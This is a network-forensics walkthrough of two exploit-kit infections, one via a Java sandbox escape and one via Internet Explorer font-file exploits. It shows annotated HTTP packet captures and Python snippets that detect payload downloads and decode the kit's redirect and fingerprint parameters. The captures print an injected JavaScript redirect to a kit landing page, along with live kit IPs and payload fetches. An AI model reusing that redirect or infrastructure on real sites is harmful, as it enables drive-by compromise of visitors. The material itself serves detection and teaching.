Detailed Analysis of the Processes and Stages of an Exploit




Here you can see the webpage that the hackers compromised (arksylhet[.]com/A67iD4eo/index.html); into that page they inserted an iframe which includes a link to a JavaScript redirect file.

2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver[.]de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: "894002-47-4ca04cfa1a5c0"
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location='http://69.194.193.34/links/systems-links_warns.php'   <-- The JavaScript file simply assigns document.location, which redirects the browser to the landing page of the exploit kit

Redirection to the landing page; note that the Referer below is the same URL the JavaScript had coded in it.

2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539
GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://69.194.193.34/links/systems-links_warns.php

The victim is then instructed to request the file "java.jar", a Java archive containing the exploit for the vulnerable version of Java (1.7.0_06).

2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273
GET /data/java.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive   <-- MIME type
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06   <-- Vulnerable version of Java
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:01 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 33010
Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT
Accept-Ranges: bytes

So, at this point the victim has been redirected to the exploit kit site and an exploit has been delivered. How do we know the exploit kit did its job? Below is the proof in the pudding: this is the request for a malicious executable file. We know that because there is no longer a Referer in the GET request, the User-Agent is still the Java one, and the "accept-encoding: pack200-gzip, gzip" header is absent from the request for the malicious file.

2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263
GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1   <-- Pointer on the exploit kit server to an executable file (the GET request does not have to contain .exe, .zip or anything of the sort to be a request for an executable; it simply points to a location on the server)
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

To confirm, we look at the server's response to the client's request:

2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:42:05 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131584
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Pragma: public
Expires: Wed, 19 Sep 2012 02:42:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"   <-- There it is: the GET request resulted in the download of a file named "contacts.exe"
Content-Transfer-Encoding: binary

MZ......@........ .!..L.!This program cannot be run in DOS mode..

To summarize: at this point the exploit kit successfully exploited the victim's machine, because it made the machine download a file without the user's consent by exploiting a vulnerability in Java that allowed a break-out from the sandbox onto the victim's machine. This does not mean that the victim was infected by the file or that any malware is present on the machine. Anti-virus or another host-based prevention system could easily have stopped it. The file may not even have been able to install properly.
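The request-side tells the walkthrough just listed (Java User-Agent, no Referer, no pack200-gzip Accept-Encoding) and the response-side confirmation (x-msdownload MIME type, an .exe filename, the MZ header) as a small detection check. This is an added example, not part of the original analysis; the HTTP messages are constructed from the capture above and retyped for the example.

```python
# Constructed HTTP messages modelled on the two Java client requests in the
# capture above (the java.jar fetch and the later executable fetch).
JAR_REQUEST = """GET /data/java.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34
Connection: keep-alive
"""
EXE_REQUEST = """GET /links/systems-links_warns.php?vf=0206360203&r=02&pj=w&gc=r HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06
Host: 69.194.193.34
Connection: keep-alive
"""
EXE_RESPONSE = """HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: application/x-msdownload
Content-Length: 131584
Content-Disposition: attachment; filename="contacts.exe"

MZ\x90\x00\x03"""


def parse_http(msg):
    """Split an HTTP message into (start line, {lower-cased name: value}, body)."""
    head, _, body = msg.partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def java_payload_indicators(request, response=None):
    """Return the indicators (from the walkthrough) that a Java client request
    is fetching an executable rather than a JAR. An empty list means the
    request looks like a normal Java fetch, or is not from the Java client."""
    _, req, _ = parse_http(request)
    if "java/" not in req.get("user-agent", "").lower():
        return []                      # only the Java client is of interest here
    if "pack200-gzip" in req.get("accept-encoding", "").lower():
        return []                      # pack200-gzip is what a JAR fetch asks for
    hits = ["Java client request without pack200-gzip Accept-Encoding"]
    if "referer" not in req:
        hits.append("no Referer on the Java client request")
    if response is not None:           # confirm against the server's reply
        _, resp, body = parse_http(response)
        if resp.get("content-type", "").lower() == "application/x-msdownload":
            hits.append("Content-Type application/x-msdownload")
        if ".exe" in resp.get("content-disposition", "").lower():
            hits.append("Content-Disposition names an .exe file")
        if body.startswith("MZ"):
            hits.append("body begins with the MZ header of a PE executable")
    return hits
```

On real traffic the body would be bytes rather than str; the check is the same two-byte magic.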
Flashpack Web Based Exploit Kit Exploits an Internet Explorer Vulnerability

In this scenario, the victim is using the Google Translate service to view a website. The website "hitcric[.]info" is a legitimate site hosting live cricket (the sport) games that has been hacked.

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: hitcric[.]info
Connection: Keep-Alive

2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519
HTTP/1.1 302 Moved Temporarily   <-- The hackers have taken over the domain name and forward it to a web-based exploit kit; note the "Location:" pointer
Server: nginx admin
Date: Mon, 19 May 2014 02:13:42 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==

The victim has now hit what is known as the "landing page".

2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605
GET /index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

The landing page passes browser information back to the exploit kit, below, with the POST request for "json.php":

2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699
POST /tresting/avalonr/json.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Content-Length: 207
Connection: Keep-Alive
Cache-Control: no-cache

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d

2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0

2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

The kit then sends the Internet Explorer exploit in a font file (.eot), which is a binary file format; note the large content length.

2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285
GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:48 GMT
Content-Type: application/octet-stream   <-- MIME type for a binary file
Content-Length: 22319

The first exploit appears to have failed; here is another attempt with a different exploit for Internet Explorer:

2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156
GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Cache-Control: no-cache

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0

2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:52 GMT
Content-Type: application/octet-stream
Content-Length: 13312
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: "53796b99-3400"
Accept-Ranges: bytes

BOOM... this exploit has succeeded. The GET request for "loadsilver.php" is actually a pointer to a place on the exploit kit server for the file "e53796b9e8cb041400466334.exe", and as you can see below, this is another successful exploitation.

Note: There is no discussion of malware here because there is no "callback", and in this example the executable fails to install properly as anti-virus quarantined it upon download (not that you could see that from network traffic).

2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342
GET /tresting/avalonr/loadsilver.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0

2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 94514
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Accept-Ranges: bytes
Content-Disposition: inline; filename=e53796b9e8cb041400466334.exe

MZ......@........ .!..L.!This program cannot be run in DOS mode..
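Two of the opaque values in this capture are plain encodings an analyst can unwrap during triage: the s= parameter in the 302 Location is base64 over a query string, and the id= body of the POST to json.php is hex over ASCII. Decoding both in Python, as an added example that is not part of the original analysis (the values are copied from the capture above; the reading of the decoded fingerprint tokens as plugin and browser names is my interpretation):

```python
import base64
from urllib.parse import parse_qs

# Values copied from the capture above: the 302 Location returned by the
# compromised hitcric[.]info host and the body of the POST to json.php.
LOCATION = ("http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php"
            "?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkm"
            "c3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==")
POST_BODY = ("id=306a617661646273696c766572666c323031346d736965387c"
             "6c6579396e6275396334633572336f6965333831396974"
             "353239393533633138303533363266393161326431366236643037316664356230"
             "2e6e73312e626179616e646f766d6563692e636f6d")


def decode_landing_param(location):
    """Recover the query string hidden in the base64 s= parameter of the
    redirect. It records, among other things, the compromised referring
    site (surl) that sent the victim to the kit."""
    # The host is defanged with [.] so it is split by hand rather than with
    # urlsplit, which rejects brackets in the netloc.
    query = location.partition("?")[2]
    blob = parse_qs(query)["s"][0]
    inner = base64.b64decode(blob).decode("ascii")
    return {name: values[0] for name, values in parse_qs(inner).items()}


def decode_fingerprint(body):
    """Decode the hex id= value the landing page posts back to json.php.
    The ASCII text is 'fingerprint|kit hostname'; the fingerprint part reads
    like a list of detected plugin/browser tokens (java, silverlight, msie)."""
    hexstr = parse_qs(body)["id"][0]
    text = bytes.fromhex(hexstr).decode("ascii")
    fingerprint, _, kit_host = text.partition("|")
    return fingerprint, kit_host


if __name__ == "__main__":
    for name, value in decode_landing_param(LOCATION).items():
        print(f"{name} = {value}")
    print(decode_fingerprint(POST_BODY))
```

The decoded surl field matches the hacked site seen in the Referer, which is the link between the legitimate site and the kit that a responder would want to document.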
